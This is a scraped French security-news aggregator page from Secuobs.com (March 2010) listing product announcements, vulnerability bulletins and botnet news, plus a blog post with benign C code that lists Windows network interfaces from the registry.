problèmes aux enquêteurs TIC et NTech de tous pays Les habitués du Ressource Kit http://www.secuobs.com/revue/news/197990.shtmlhttp://www.secuobs.com/revue/news/197990.shtml Secuobs.com : 2010-03-04 12:56:13 - CNIS mag - Amusante découverte, que celle que Jerry Bryant nous dévoile sur le blog du MSRC un double problème affectant Internet Explorer et win32hlp fichiers d aide permettrait à un attaquant, via une page Web forgée, de compromettre la machine d un internaute de passage en le convainquant d appuyer sur la touche F1 de sa machine Un fichier http://www.secuobs.com/revue/news/197989.shtmlhttp://www.secuobs.com/revue/news/197989.shtml Secuobs.com : 2010-03-04 12:31:52 - L'Atelier.fr Toute l'actualité - Choisir quelles données personnelles partager et avec qui ne doit rien au hasard, affirme l'université de Cornell C'est au contraire le fruit d'une réflexion sur les avantages et les risques liés à leur propagation IMAGE IMAGE IMAGE IMAGE http://www.secuobs.com/revue/news/197987.shtmlhttp://www.secuobs.com/revue/news/197987.shtml Secuobs.com : 2010-03-04 11:50:01 - Global Security Mag Online - PGP Corporation annonce la nomination de John Adams au poste de Chief Technology Officer CTO John Adams, un expert du secteur de la sécurité depuis 30 ans, prend ses nouvelles fonctions suite à la récente acquisition de ChosenSecurity par PGP Corporation Dans ses nouvelles attributions, il pilotera la stratégie technologique de PGP Corporation, et aura notamment pour mission de gérer l'intégration des efforts et des politiques technologiques des deux équipes d'ingénierie Dans son précédent - Business http://www.secuobs.com/revue/news/197976.shtmlhttp://www.secuobs.com/revue/news/197976.shtml Secuobs.com : 2010-03-03 22:15:32 - Global Security Mag Online - Auditware, en collaboration avec le CCA-Club de la Continuité d'Activité et le soutien du CLUSIF, de l'AFAI et de l'IFACI, s'est chargée de l'organisation technique de la 2e Agora Continuité d'Activité le 16 Mars prochain Le programme réunira parmi les plus hauts responsables Continuité de BNPParibas, Orange, Compagnie Nationale du Rhône 2e fournisseur d'énergie électrique en France , un guru reconnu internationalement en Management des Risques, des experts internationaux et un avocat pour nous - ÉVÉNEMENTS http://www.secuobs.com/revue/news/197738.shtmlhttp://www.secuobs.com/revue/news/197738.shtml Secuobs.com : 2010-03-03 22:15:32 - Global Security Mag Online - Stéphane Fymat, Vice Président Stratégie Développement de Passlogix, est venu en France présenté son nouveau concept v-GO Universal Authentication Manager, une véritable passerelle universelle d'authentification forte C'est accompagné de Philippe Bonnet directeur EMEA de Passlogix qu'il a rencontré la rédaction de Global Security Mag pour dévoiler cette nouvelle solution Philippe bonnet et Stéphane Fymat Aujourd'hui le marché de l'authentification forte dans l'entreprise a du mal à se - Investigations affiche_droite http://www.secuobs.com/revue/news/197737.shtmlhttp://www.secuobs.com/revue/news/197737.shtml Secuobs.com : 2010-03-03 22:10:12 - CNIS mag - Quel thème Scott Charney a-t-il choisi pour ouvrir son keynote RSA Conference Celui du Cloud, bien entendu Le VP Informatique de Confiance de Microsoft explique que sans confiance de bout en bout , il ne pourrait exister de Cloud Computing encore et toujours la sécurité et cette confiance débute http://www.secuobs.com/revue/news/197730.shtmlhttp://www.secuobs.com/revue/news/197730.shtml Secuobs.com : 2010-03-03 22:10:12 - CNIS mag - La RSA Conference réveille un peu l actualité Cloud Computing Avec notamment l annonce de Computer Associates qui annonce son ralliement à la Cloud Security Alliance CSA et sa promesse de contribution au prochain guide de la sécurité dans le nuage Hewlett Packard, de son côté, et toujours pour le compte du CSA, vient http://www.secuobs.com/revue/news/197729.shtmlhttp://www.secuobs.com/revue/news/197729.shtml Secuobs.com : 2010-03-03 20:45:26 - Global Security Mag Online - Avec ses nouvelles séries bintec R et bintec RT, Funkwerk Enterprise Communications FEC propose des passerelles professionnelles VPN, adaptées aux PME PMIs et aux sièges des entreprises Conçus dans des boîtiers métalliques 19 , avec une alimentation intégrée économique en énergie, ces produits garantissent une fiabilité sans norme pour toute application sensible Série R - Routeur IP Grâce à sa conception, la série bintec R offre des passerelles VPN au fonctionnement souple, qui sont fournies - Produits http://www.secuobs.com/revue/news/197709.shtmlhttp://www.secuobs.com/revue/news/197709.shtml Secuobs.com : 2010-03-03 20:45:26 - Global Security Mag Online - La Garde civile espagnole a arrêté trois hommes soupçonnés d'appartenir au réseau Mariposa, papillon en espagnol Mariposa a infecté des ordinateurs dans plus de 190 pays et la moitié des 1000 plus grandes sociétés au monde ont été affectées selon Panda Security qui a aidé la police espagnole dans son enquête et Defence Intelligence, au Canada Le virus était programmé pour collecter des données confidentielles dans les ordinateurs infectés et de les envoyer à un centre de commandement et de - Info Malwares http://www.secuobs.com/revue/news/197708.shtmlhttp://www.secuobs.com/revue/news/197708.shtml Secuobs.com : 2010-03-03 19:18:36 - Les derniers documents du CERTA. - Une vulnérabilité dans McAfee LinuxShield permet, entre autres, l'exécution de code arbitraire à distance http://www.secuobs.com/revue/news/197682.shtmlhttp://www.secuobs.com/revue/news/197682.shtml Secuobs.com : 2010-03-03 19:18:36 - Les derniers documents du CERTA. - Une vulnérabilité dans Novell eDirectory permet à une personne malintentionnée de provoquer un déni de service à distance http://www.secuobs.com/revue/news/197681.shtmlhttp://www.secuobs.com/revue/news/197681.shtml Secuobs.com : 2010-03-03 19:01:08 - L'Atelier.fr Toute l'actualité - Internet est de plus en plus plébiscité par les internautes comme moyen d'accéder à l'actualité Les réseaux sociaux y sont pour quelque chose ils contribuent à faire de l'information une activité socialisante IMAGE IMAGE IMAGE IMAGE http://www.secuobs.com/revue/news/197677.shtmlhttp://www.secuobs.com/revue/news/197677.shtml Secuobs.com : 2010-03-03 19:01:08 - L'Atelier.fr Toute l'actualité - La pénétration des smartphones en Asie du sud-est est encore majoritairement confinée aux zones urbaines dynamiques Pour des raisons de coût de l'appareil et d'infrastructures Mais la situation tend à changer IMAGE IMAGE IMAGE IMAGE http://www.secuobs.com/revue/news/197676.shtmlhttp://www.secuobs.com/revue/news/197676.shtml Secuobs.com : 2010-03-03 18:22:26 - Global Security Mag Online - Western Digital annonce le lancement de son premier disque SSD orienté consommateur le SSD SiliconEdge 2,5 pouces Les disques SSD SiliconEdge Blue de WD offrent des vitesses élevées de lecture écriture et de hautes capacités SSD Ils représentent ainsi des solutions de stockage idéales pour les applications de lecture intensive, qui exigent une excellente performance et une compatibilité plug-and-play Les SSD SiliconEdge Blue de WD, avec des capacités allant jusqu'à 256 Go, sont dotés d'une - Produits http://www.secuobs.com/revue/news/197663.shtmlhttp://www.secuobs.com/revue/news/197663.shtml Secuobs.com : 2010-03-03 18:22:26 - Global Security Mag Online - La société d'édition AxBx annonce la sortie de l'édition 2010 de son logiciel PC Security Test PC Security Test est un logiciel gratuit qui fournit à l'utilisateur des outils, des informations et des conseils pour tester et améliorer la sécurité de son PC PC Security Test permet de contrôler qu'un PC est bien protégé contre les virus, les spywares et les intrusions piratage En quelques clics, l'utilisateur contrôle facilement et rapidement l'efficacité de ses systèmes de protection antivirus, - Produits http://www.secuobs.com/revue/news/197662.shtmlhttp://www.secuobs.com/revue/news/197662.shtml Secuobs.com : 2010-03-03 18:22:26 - Global Security Mag Online - RSA, la Division de Sécurité d'EMC a dévoilé lors de la RSA Conference une vision partagée avec Intel et VMware pour construire une infrastructure de services métier Cloud plus sécurisée, plus transparente et plus responsable Cette vision, qui tire parti de la technologie et de l'expertise de RSA, d'Intel et de VMware, est décrite dans un nouveau RSA Security Brief intitulé Sécurité de l'infrastructure Aller aux tréfonds de la conformité dans le Cloud Cette vision est démontrée par un - Business http://www.secuobs.com/revue/news/197661.shtmlhttp://www.secuobs.com/revue/news/197661.shtml Secuobs.com : 2010-03-03 18:22:26 - Global Security Mag Online - WD présente ses nouveaux disques durs portables My Passport Studio Ces derniers sont équipés de l'interface ultra-rapide FireWire 800 et d'une étiquette digitale personnalisable, qui reste toujours visible, même lorsque le disque dur est débranché Avec un design épuré et élégant, les nouveaux disques durs haute performance My Passport Studio sont formatés pour les Mac et sont compatibles avec le logiciel Apple TimeMachine Ces disques durs assurent une sauvegarde automatique et continue grâce au - Produits http://www.secuobs.com/revue/news/197660.shtmlhttp://www.secuobs.com/revue/news/197660.shtml Secuobs.com : 2010-03-03 17:55:09 - Geo's blog - Hello les gens, Lors de mon dernier poste traitant de la lib winpcap et de ses fonctionnalités, j'avais parlé, en conclusion, d'analyser son fonctionnement Effectivement, j'étais resté perplexe et me posait une question En effet, il faut savoir que Microsoft restreint l'usage des Raw Socket , où nous sommes en mesure de forger nos propres paquets On m'a conseillé d'abandonner, et je me suis rendu compte que j'avais bien fait de désobéir Pour ceux qui veulent des infos sur les Raw Socket avec WinSock http msdnmicrosoftcom en-us library ms740548pourcents28VS85pourcents29aspx Vous comprendrez plus ou moins que si vous voulez balancer un paquet ARP, vous pouvez allez vous faire foutre Au moins, ça a le mérite d'être clair Mais, quand il s'agit de winpcap, on peut faire ce qu'on veut Etrange, non Alors je me suis mis en tête d'analyser ça La question Comment ça fonctionne Question brève pour une réponse qui va se scinder en probablement plusieurs postes Dans ce premier poste, j'irai tout en douceur On n'apprendra pas à balancer sniffer des paquets, mais juste à récupérer la liste des interfaces réseau c'est déjà bien pour commencer, non Les tests sont menés, ici, sous un windows XP SP3 Il se peut que ça marche sur la série XP, mais je ne garantie rien quant à Vista Seven et encore moins sous les versions antérieures Les interfaces réseau Sous Windows, on peut avoir une ou plusieurs interfaces réseau Votre carte ethernet en est une, aussi bien que votre carte Wifi J'ai même une clé USB Wifi reconnue en tant qu'interface réseau Il se peut aussi que les machines virtuelles engendrent la création d'interfaces réseau exploitables je ne me suis pas penché sur ce genre de chose, mais certains reversers doivent avoir la réponse Pour récupérer cette liste d'interfaces réseau, il faut aller chercher dans la base de registre à ce chemin HKEY_LOCAL_MACHINE SYSTEM CurrentControlSet Control Class 4D36E972-E325-11CE-BFC1-08002BE10318 Dans cette clé figurent des sous-clés ayant pour non 0000, puis 0001, puis 0002, A croire qu'on prévoit 10000 noms d'interfaces réseau Dans ces sous-clé se trouvent une clé nommée Linkage , et, enfin, dans cette clé Linkage se trouve une valeur de type REG_MULTI_SZ - constante signifiant plusieurs chaînes terminées par un octet nul , d'où le SZ - String Zero - qui correspond au chemin de notre interface réseau L'objectif du moment sera d'afficher chacune de ces interfaces Grâce à l'API Win32 et à sa panoplie de fonctions RegMachiChouette , ça doit pas être bien dur Quelques fonctions utiles RegOpenKeyEx Permet d'ouvrir une clé existante http msdnmicrosoftcom en-us library ms724897 VS85 aspx RegQueryValueEx Permet de récupérer la valeur d'une clé http msdnmicrosoftcom en-us library ms724911 VS85 aspx CreateFile Permet de déterminer si une interface réseau est accessible un bon indice pour la suite http msdnmicrosoftcom en-us library aa363858pourcents28VS85pourcents29aspx Ok, on aura nos interfaces, mais il faudrait aussi la description de chacune d'elles Et bien j'ai tout de même trouvé, dans la clé SOFTWARE Microsoft Windows NT CurrentVersion NetworkCards, des sous-clé ayant pour un un numéro sans les 0 devant, cette fois Mais ce sont les mêmes numéros que nos interfaces réseau de HKEY_LOCAL_MACHINE SYSTEM CurrentControlSet Control Class 4D36E972-E325-11CE-BFC1-08002BE10318 , donc il nous sera facile de faire le lien Maintenant, on se tait et on code include include include define KEY_IF_RESEAUX SYSTEM CurrentControlSet Control Class 4D36E972-E325-11CE-BFC1-08002BE10318 define KEY_DESC_RESEAUX SOFTWARE Microsoft Windows NT CurrentVersion NetworkCards int main int argc, char argv Des handle de clefs HKEY hKey, hCurrentKey, hDescKey Variables char currentPathKey, currentDescKey Numéro de l'interface sous chaîne de caractères char currentNumber 5 compteur de l'interface int cpt 0 Handle sur l'interface qui va nous permettre de savoir si on peut l'ouvrir ou pas HANDLE hDevice Variable dont on se sert pour connaître les octets retournés par une fonction LONG dwBytesReturned Tampons char buffer 1024 char devName 1024 char desc 1024 Première étape ouverture de la clé en question LONG Status RegOpenKeyEx HKEY_LOCAL_MACHINE, KEY_IF_RESEAUX, 0, KEY_ALL_ACCESS, hKey if Status ERROR_SUCCESS On la ferme puisqu'on n'en a plus besoin RegCloseKey hKey Les sous-clé s'appellent toutes 0000, 0001, Donc il va falloir les parcourir strlen 0000 Linkage ' 0' 14 sprintf currentNumber, pourcents04d , cpt On prépare le chemin de la clé dans le registre currentPathKey char malloc strlen KEY_IF_RESEAUX 14 strcpy currentPathKey, KEY_IF_RESEAUX strcat currentPathKey, strcat currentPathKey, currentNumber strcat currentPathKey, Linkage On ouvre cette clé Status RegOpenKeyEx HKEY_LOCAL_MACHINE, currentPathKey, 0, KEY_ALL_ACCESS, Tant qu'on arrive à ouvrir la clé while Status ERROR_SUCCESS La valeur Export nous intéresse Status RegQueryValueEx hCurrentKey, Export , NULL, NULL, BYTE buffer, DWORD Si on a réussit à lire la valeur, on l'affiche if Status ERROR_SUCCESS On teste si l'interface est accessible sprintf devName, Global pourcentss , hDevice CreateFile devName, GENERIC_READ GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, 0 if hDevice INVALID_HANDLE_VALUE On essaie de récupérer la description de cette carte sprintf currentNumber, pourcentsd , atoi currentNumber 1 printf pourcentss pourcentss n , buffer, currentNumber strlen xxxx ' 0' 6 currentDescKey char malloc strlen KEY_DESC_RESEAUX 6 strcpy currentDescKey, KEY_DESC_RESEAUX strcat currentDescKey, strcat currentDescKey, currentNumber On ouvre la clef de la description Status RegOpenKeyEx HKEY_LOCAL_MACHINE, currentDescKey, 0, KEY_ALL_ACCESS, if Status ERROR_SUCCESS Description nous intéresse Status RegQueryValueEx hDescKey, Description , NULL, NULL, BYTE desc, DWORD if Status ERROR_SUCCESS printf pourcentss pourcentss n , buffer, desc RegCloseKey hDescKey free currentDescKey CloseHandle hDevice ZeroMemory currentPathKey, strlen KEY_IF_RESEAUX 14 On prépare le chemin de la clé suivante sprintf currentNumber, pourcents04d , cpt strcpy currentPathKey, KEY_IF_RESEAUX strcat currentPathKey, strcat currentPathKey, currentNumber strcat currentPathKey, Linkage On la relit Status RegOpenKeyEx HKEY_LOCAL_MACHINE, currentPathKey, 0, KEY_ALL_ACCESS, On libère tout le tralala on se casse free currentPathKey RegCloseKey hCurrentKey return EXIT_SUCCESS Pour la source clean, c'est par ici http venom630freefr geo blog reverse_pcap part1 getInterfacesReseauhtml Le gros cadeau, c'est qu'il faille simplement compiler un seul fichier Pas de lib à linker ni rien Le résultat que j'obtiens C Documents and Settings Geoffrey Mes documents cgetInterfacesReseauexe Device 8EEB3BBC-655E-4E05-A2DD-92A5325081A6 Belkin Wireless G Plus MIMO USB Network Adapter Device F9415153-9262-4C55-B0A4-D9D3B9911CB7 Realtek PCIe FE Family Controller Pour récupérer les adresses IPs, j'ai pas cherché plus loin Mais ça ne nous gênera pas pour la suite Et j'ai pas testé sur d'autres postes, donc je ne vous garantie rien Mais alors rien du tout Conclusion Certes, l'article a été très court, mais c'était pour vous montrer un aperçu Là, on saura quelles interfaces emmerder pour pouvoir balancer nos paquets Et n'importe quel paquet, de surcroit Geo http://www.secuobs.com/revue/news/197645.shtmlhttp://www.secuobs.com/revue/news/197645.shtml Secuobs.com : 2010-03-03 17:44:47 - BUG BROTHER - Il m arrive rarement de porter la cravate, encore plus rarement de me travestir en paramilitaire, ce que je fais néanmoins, une fois par an, depuis dix ans maintenant, à l occasion des Big Brother Awards BBA, dont je suis , la seule cérémonie de remise de prix qu évitent soigneusement de venir retirer ceux qui, pourtant, les ont suite http://www.secuobs.com/revue/news/197636.shtmlhttp://www.secuobs.com/revue/news/197636.shtml Secuobs.com : 2010-03-03 17:28:42 - Global Security Mag Online - F5 Networks, Inc, annonce la disponibilité de nouvelles solutions venant enrichir sa gamme BIG-IP Parmi les nouveautés proposées par F5 figurent Le boîtier BIG-IP Edge Gateway, pour contrôler les accès distants Ce boîtier réunit sur une plate-forme les dispositifs d'accès distant sécurisé VPN SSL, d'optimisation de trafic optimisation WAN et d'accélération applicative optimisation Web BIG-IP Edge Gateway est d'ores et déjà disponible Le module logiciel BIG-IP Access Policy Manager APM - Produits http://www.secuobs.com/revue/news/197631.shtmlhttp://www.secuobs.com/revue/news/197631.shtml Secuobs.com : 2010-03-03 17:28:42 - Global Security Mag Online - Pour Jean-Marc Grémy, Cabestan Consultants, consultant indépendant reconnu de l'industrie de la sécurité, la RSA Conference 2010 est placée sous le baseline de Security Decoded Cette conférence se veut éducative et compte nous projeter en avant pour comprendre, enfin, les enjeux de sécurité IT mais peut être pas seulement du 21ème siècle Il nous propose sa vision de cette événement Cette 19ème édition de la RSA Conference, qui se tient à San Francisco présente un panel de personnalités en - Investigations affiche_gauche http://www.secuobs.com/revue/news/197630.shtmlhttp://www.secuobs.com/revue/news/197630.shtml Secuobs.com : 2010-03-03 17:10:39 - L'Atelier.fr Toute l'actualité - Il ne suffit pas de proposer des services web pour parler de gouvernement ou d'institutions en ligne Il faut proposer des outils qui favorisent les échanges élus citoyens et orientés vers l'utilisateur IMAGE IMAGE IMAGE IMAGE http://www.secuobs.com/revue/news/197624.shtmlhttp://www.secuobs.com/revue/news/197624.shtml Secuobs.com : 2010-03-03 16:36:13 - Global Security Mag Online - Croyant s'inscrire pour tester le futur iPad d'Apple, des milliers d'utilisateurs de Facebook ont été amenés malgré eux à s'abonner à un service de téléphonie mobile surtaxé, révèle Sophos Sophos a réalisé une vidéo démontrant le mécanisme de l'escroquerie, disponible sur YouTube à l'adresse http wwwyoutubecom watch v jzhF Des pages Facebook tablant sur le désir du public de disposer d'un iPad gratuit sont apparues sur le site de réseau social, avec des noms tels que iPad Researchers Wanted - Get An - Info Malwares http://www.secuobs.com/revue/news/197612.shtmlhttp://www.secuobs.com/revue/news/197612.shtml Secuobs.com : 2010-03-03 16:36:13 - Global Security Mag Online - En collaboration avec le FBI américain, la police espagnole démantèle un réseau de près de 13 millions d'ordinateurs zombies, mis à mal par le botnet Mariposa papillon en espagnol Mariposa a infecté des ordinateurs dans 190 pays Particuliers, entreprises privées et organismes publics ont été touchés par le phénomène Le virus était programmé pour collecter des numéros de carte de crédit ou autres données confidentielles Trois espagnols, soupçonnés d'appartenir à ce réseau de pirates, ont été - Info Malwares http://www.secuobs.com/revue/news/197611.shtmlhttp://www.secuobs.com/revue/news/197611.shtml Secuobs.com : 2010-03-03 16:29:58 - Vigilance vulnérabilités publiques - Le produit Adobe Download Manager peut être utilisé pour installer un logiciel non désiré http://www.secuobs.com/revue/news/197610.shtmlhttp://www.secuobs.com/revue/news/197610.shtml Secuobs.com : 2010-03-03 16:18:28 - L'Atelier.fr Toute l'actualité - Comment le Jeu Sérieux qui, il y a encore deux ans, n'intéressait absolument personne ou presque , est devenu le sujet à la mode que tout le monde s'arrache aujourd'hui IMAGE IMAGE IMAGE IMAGE http://www.secuobs.com/revue/news/197608.shtmlhttp://www.secuobs.com/revue/news/197608.shtml Secuobs.com : 2010-03-03 16:18:28 - L'Atelier.fr Toute l'actualité - En utilisant un brassard équipé de capteurs, Skinput transforme les pressions produites par le doigt sur la peau en actions sur un smartphone Il peut être couplé à un pico-projecteur qui projette un clavier IMAGE IMAGE IMAGE IMAGE http://www.secuobs.com/revue/news/197607.shtmlhttp://www.secuobs.com/revue/news/197607.shtml Secuobs.com : 2010-03-03 15:30:32 - Global Security Mag Online - Sécurité de l'information les tendances 2010 présentées par IDC et Websense Web 20, SaaS, prévention contre la perte de données DLP Quelles sont les priorités Jeudi 18 mars, 9h à 11h30 Pavillon Cambon Capucines, Paris 1er wwwwebsensecom 18mars Le 18 mars, retrouvez IDC et Websense au Pavillon Cambon Capucines pour débattre des tendances 2010 sur le marché de la sécurité de l'information des difficultés auxquelles se heurtent les professionnels de la sécurité - ÉVÉNEMENTS primetime http://www.secuobs.com/revue/news/197589.shtmlhttp://www.secuobs.com/revue/news/197589.shtml Secuobs.com : 2010-03-03 15:30:32 - Global Security Mag Online - Stéphane Drain, Président du Directoire de CertEurope, premier Tiers de Confiance qualifié, revient sur les grandes tendances de 2009 en matière de dématérialisation et détaille ce que l'on peut attendre de 2010, notamment à la lumière du label gouvernemental IDéNum Que peut-on retenir de 2009 en matière de dématérialisation et quels ont été selon vous les vecteurs de croissance ou de frein sur ce marché En matière de dématérialisation, on voit bien que le potentiel s'étend de manière très rapide - Points de Vue affiche_droite http://www.secuobs.com/revue/news/197588.shtmlhttp://www.secuobs.com/revue/news/197588.shtml Secuobs.com : 2010-03-03 15:30:32 - Global Security Mag Online - Lors du discours d'ouverture de la RSA Conférence 2010, Art Coviello, Président de RSA, la Division de Sécurité d'EMC, a vivement recommandé à ses collègues de l'industrie de la sécurité de saisir les défis et les opportunités apportés par les infrastructures virtuelles et d'adopter une vision de la sécurité plus expansive en se concentrant sur les transformations associées au Cloud computing Certains leaders de l'industrie notamment Dave Cullinane, CISO chez eBay et Paul Maritz, CEO de VMWARE ont apportés - Points de Vue http://www.secuobs.com/revue/news/197587.shtmlhttp://www.secuobs.com/revue/news/197587.shtml Secuobs.com : 2010-03-03 15:17:05 - Ma petite parcelle d'Internet... - S i vous vous intéressez aux reflex numériques, vous avez forcément vu ou entendu une mention à la fameuse équivalence focale 35mm Pour résumer rapidement, on vous explique que si vous montez un objectif sur un reflex numérique équipé d'un capteur APS-C, c'est à dire ce qui équipe les boîtiers grand public ou semi-professionnels, il faut multiplier sa longueur focale par généralement 15 pour obtenir la focale effective Donc que si vous montez un 200mm sur ce boîtier, vous obtiendrez l'équivalent d'un 300mm monté sur un boîtier 24x36 ou Full Frame C'est beau, c'est magique Enfin quand même, quand on est un peu curieux, ou qu'on a fait un peu d'optique, on ne peut que se demander par quel miracle une valeur propre à l'objectif, sa longueur focale, se trouverait affectée par une modification de la taille de la surface sensible au niveau du boîtier Comme pleins de choses dans la vie, c'est bien sûr un résumé un peu rapide pour expliquer la réalité Raccourci largement exploité par certains marketeux http://www.secuobs.com/revue/news/197585.shtmlhttp://www.secuobs.com/revue/news/197585.shtml Secuobs.com : 2010-03-03 14:18:56 - L'Atelier.fr Toute l'actualité - Les sites institutionnels ne doivent pas seulement soigner l'ergonomie de leur plate-forme pour être mieux identifiés mais aussi miser sur les méta-données Ce, afin d'améliorer leur référencement IMAGE IMAGE IMAGE IMAGE http://www.secuobs.com/revue/news/197571.shtmlhttp://www.secuobs.com/revue/news/197571.shtml Secuobs.com : 2010-03-03 13:57:24 - Bruno Kerouanton - Peu de gens semblent être au courant, mais de nouvelles législations et procédures en gestation nous amènent peu à peu dans un monde orwellien Il faut juste faire attention à ce que toute dérive puisse être évitée 1 De la nécessité de tracer certaines actions Dans mon précédent billet, j annonçais avoir été victime d une fraude bancaire Motif http://www.secuobs.com/revue/news/197561.shtmlhttp://www.secuobs.com/revue/news/197561.shtml Secuobs.com : 2010-03-03 13:36:11 - Global Security Mag Online - McAfee annonce la nomination de Georges Millet au poste de Vice-Président Channel pour la région EMEA Précédemment, Georges Millet a occupé plusieurs postes stratégiques chez Autodesk dont, dernièrement, celui de directeur du réseau EMEA et de la conformité des licences Avec plus de 25 années d'expérience commerciale dans le secteur des technologies, Georges Millet apporte à McAfee une vision et une expérience unique des partenariats et des réseaux de distribution qui sont au cœur des métiers de - Business http://www.secuobs.com/revue/news/197559.shtmlhttp://www.secuobs.com/revue/news/197559.shtml Secuobs.com : 2010-03-03 12:37:42 - Global Security Mag Online - Symantec Corp publie l'édition de février 2010 de son rapport MessageLabs Intelligence Cette analyse a révèle une forte hausse des niveaux de spams pour le deuxième mois de l'année, atteignant désormais 89,4 pourcents, soit une augmentation de 5,5 pourcents par rapport à janvier Cette tendance est principalement due à un accroissement du nombre de spams émanant des botnets Grum et Rustock Alors que le volume de spams en provenance de Grum a connu peu de variation au cours de l'année dernière, cette tendance s'est - Info Malwares http://www.secuobs.com/revue/news/197549.shtmlhttp://www.secuobs.com/revue/news/197549.shtml Secuobs.com : 2010-03-03 12:37:42 - Global Security Mag Online - Mobotix, fabricant de systèmes complets de vidéosurveillance IP, présente le système M24M Allround Successeur de la M22M, cette caméra est équipée d'un nouveau microprocesseur et d'une plate-forme système modifiée qui permet la transmission d'images vidéo à une vitesse pouvant atteindre 30 images par seconde, même en résolution mégapixels Cinq objectifs interchangeables sont proposés sur la M24M, pour un angle d'ouverture compris entre 15 et 90 degrés l'objectif grand-angle de 90 permet de - Produits http://www.secuobs.com/revue/news/197548.shtmlhttp://www.secuobs.com/revue/news/197548.shtml Secuobs.com : 2010-03-03 12:37:42 - Global Security Mag Online - L'opérateur de sauvegarde Archiv Tech propose la solution de sauvegarde externalisée NeoArchiv NeoArchiv, la plateforme de sauvegarde de données informatiques conçue par Archiv Tech est Server Centric Elle peut être utilisée quels que soient les systèmes d'exploitation utilisés Microsoft Windows, Mac OS, Linux, Unix, Le mode de fonctionnement SaaS permet également de ne pas avoir à se soucier d'installation de logiciel ou de matériel La duplication des données se fait dans deux Data Centers - Produits http://www.secuobs.com/revue/news/197547.shtmlhttp://www.secuobs.com/revue/news/197547.shtml Secuobs.com : 2010-03-03 12:30:02 - Vigilance vulnérabilités publiques - Sur un processeur Sparc, les pages mémoire marquées comme non exécutables sont en fait exécutables http://www.secuobs.com/revue/news/197546.shtmlhttp://www.secuobs.com/revue/news/197546.shtml Secuobs.com : 2010-03-03 12:18:03 - L'Atelier.fr Toute l'actualité - Quand ils enregistrent leur nom de domaine, les internautes réalisent des erreurs - volontaires ou non Ce qui rend difficile la tâche de services comme Whois, qui recherche les données relatives à ces sites IMAGE IMAGE IMAGE IMAGE http://www.secuobs.com/revue/news/197544.shtmlhttp://www.secuobs.com/revue/news/197544.shtml Secuobs.com : 2010-03-03 11:41:32 - Global Security Mag Online - Les utilisateurs francophones, particuliers ou entreprises, pourront désormais communiquer entre eux et poser leurs questions à Doctor Web via l'espace forums de l'éditeur, désormais accessible en français Cet espace web se compose de plusieurs forums dédiés à des produits spécifiques DrWeb pour Windows, DrWeb Enterprise Suite, DrWeb pour Mac OS X, pour Kerio, Exchange et d'autres Les sections Questions générales et Discussions libres permettent aux utilisateurs d'échanger librement entre - Business http://www.secuobs.com/revue/news/197527.shtmlhttp://www.secuobs.com/revue/news/197527.shtml Secuobs.com : 2010-03-03 10:45:57 - Global Security Mag Online - Stéphane Drain, Président du Directoire de CertEurope, premier Tiers de Confiance qualifié, revient sur les grandes tendances de 2009 en matière de dématérialisation et détaille ce que l'on peut attendre de 2010, notamment à la lumière du label gouvernemental IDéNum Que peut-on retenir de 2009 en matière de dématérialisation et quels ont été selon vous les vecteurs de croissance ou de frein sur ce marché En matière de dématérialisation, on voit bien que le potentiel s'étend de manière très rapide On - Points de Vue http://www.secuobs.com/revue/news/197510.shtmlhttp://www.secuobs.com/revue/news/197510.shtml Secuobs.com : 2010-03-03 10:45:57 - Global Security Mag Online - A l'occasion du CeBIT, G Data annonce EndpointProtection et étoffe ainsi sa gamme de produits de sécurité pour les entreprises Ce nouveau logiciel assure non seulement la protection contre les malwares, les spams et les attaques pirates, mais garantit également l'adhésion des employés à la charte NTIC de leur entreprise G Data EndPointProtection restreint par exemple l'utilisation des périphériques de stockage amovibles, l'installation de programmes ou la navigation sur Internet G Data - Produits http://www.secuobs.com/revue/news/197509.shtmlhttp://www.secuobs.com/revue/news/197509.shtml Secuobs.com : 2010-03-03 01:27:23 - tmp lab - The next Wireless Battle Mesh will take place from Wed 2nd till Sun 6th of June in Bracciano near Rome , Italy The event aims to bring together people from across Europe to test the performance of different routing protocols for ad-hoc networks, like Babel, BATMAN, and OLSR This third WBM will be improving the testbed http://www.secuobs.com/revue/news/197374.shtmlhttp://www.secuobs.com/revue/news/197374.shtml Secuobs.com : 2010-03-02 23:45:51 - Big Brother Awards France - Communiqué de Privacy France, 3 mars 2010 Putain 10 ans 10 ans déjà que les Big Brother Awards BBA France décernent, tous les ans, leurs prix infâmants Créés en 1998 au Royaume-Uni, lancés en France en l'an 2000 et repris, depuis, dans près d'une vingtaine de pays, les BBA sont la seule cérémonie ayant vocation à disparaître Las, les promoteurs zélés de la société de surveillance et des atteintes à la vie privée sont toujours aussi nombreux, et les BBA se voient contraints, une fois encore, - Communiqués 2010 http://www.secuobs.com/revue/news/197343.shtmlhttp://www.secuobs.com/revue/news/197343.shtml Secuobs.com : 2010-03-02 20:37:14 - Global Security Mag Online - Kaspersky Lab, éditeur de solutions de sécurité informatique contre toutes les formes de menaces cyber criminelles botnets, escroqueries, phishing, spams, etc , dévoile Kaspersky PURE, une nouvelle approche dans la protection des utilisateurs et de leur famille contre la pollution numérique Kaspersky PURE fournit aux Internautes un environnement sain, dans lequel leurs PCs, leurs dossiers, leurs services ou leur identité numérique sont à l'abri des menaces cyber criminelles, des - Produits http://www.secuobs.com/revue/news/197257.shtmlhttp://www.secuobs.com/revue/news/197257.shtml Secuobs.com : 2010-03-02 19:41:53 - Global Security Mag Online - Websense, Inc annonce le lancement d'un programme mondial pour les MSSP Managed Security Service Provider fournisseur de services de sécurité managés L'accroissement considérable des attaques Web combinées entraîne une accélération de l'adoption de solutions de sécurité Celles-ci répondent aux exigences d'une utilisation croissante d'applications Web, d'outils de collaboration en ligne et de la messagerie afin d'exploiter, d'échanger et de partager des données L'adoption croissante de technologies - Produits http://www.secuobs.com/revue/news/197231.shtmlhttp://www.secuobs.com/revue/news/197231.shtml Secuobs.com : 2010-03-02 19:41:53 - Global Security Mag Online - La solution VoIP de Patton-Inalp offrant une connectivité Any-to-Any pour les configurations IP-PBX avec SIP Trunking est sortie Doté d'une connectivité SIP Any-to-Any paramétrable, et d'un routage IP sécurisé avec QoS, le SmartNode 5200 Enterprise Session Border Router est le SBC Session Border Controller - Contrôleur de session en périphérique le plus flexible du secteur industriel Patton-Inalp, le spécialiste des équipements d'accès réseau, de connectivité, de VoIP et de vidéo - Produits http://www.secuobs.com/revue/news/197230.shtmlhttp://www.secuobs.com/revue/news/197230.shtml Secuobs.com : 2010-03-02 19:41:53 - Global Security Mag Online - Le lancement de la solution Cisco AnyConnect Secure Mobility ainsi que le déploiement de Cisco TrustSecTM sont les premiers éléments de cette nouvelle architecture La protection 